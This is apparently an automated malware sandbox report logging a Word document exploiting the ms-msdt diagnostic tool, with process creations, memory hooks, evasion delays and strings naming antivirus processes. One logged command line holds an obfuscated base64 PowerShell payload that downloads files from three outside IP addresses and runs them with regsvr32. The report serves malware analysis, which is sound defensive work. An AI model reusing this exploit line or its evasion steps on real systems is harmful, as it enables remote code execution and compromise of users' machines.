Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dll
Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dll
Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 6956 base: CDF380 value: E9 40 6E E4 FF
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 6936 base: CDF380 value: E9 40 6E 5B 02
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 5012 base: CDF380 value: E9 40 6E A3 FF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024 Thread sleep count: 6508 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900 Thread sleep time: -9223372036854770s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024 Thread sleep count: 1582 > 30
                          Source: C:\Windows\SysWOW64\explorer.exe TID: 6660 Thread sleep count: 9997 > 30
                          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3372 Thread sleep count: 114 > 30
                          Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6508
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1582
                          Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 2450
                          Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1542
                          Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 9997
                          Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                          Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                          Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BDD62 GetSystemInfo,
                          Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BBCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049BBCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AABCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0481BCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BEEBB LoadLibraryA,GetProcAddress,
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Windows\SysWOW64\regsvr32.exe Memory protected: page write copy | page execute and write copy | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: unknown protection: execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: unknown protection: execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: unknown protection: execute and read and write
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                          Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BA065 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BDD81 GetVersionExA,GetCurrentProcessId,
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

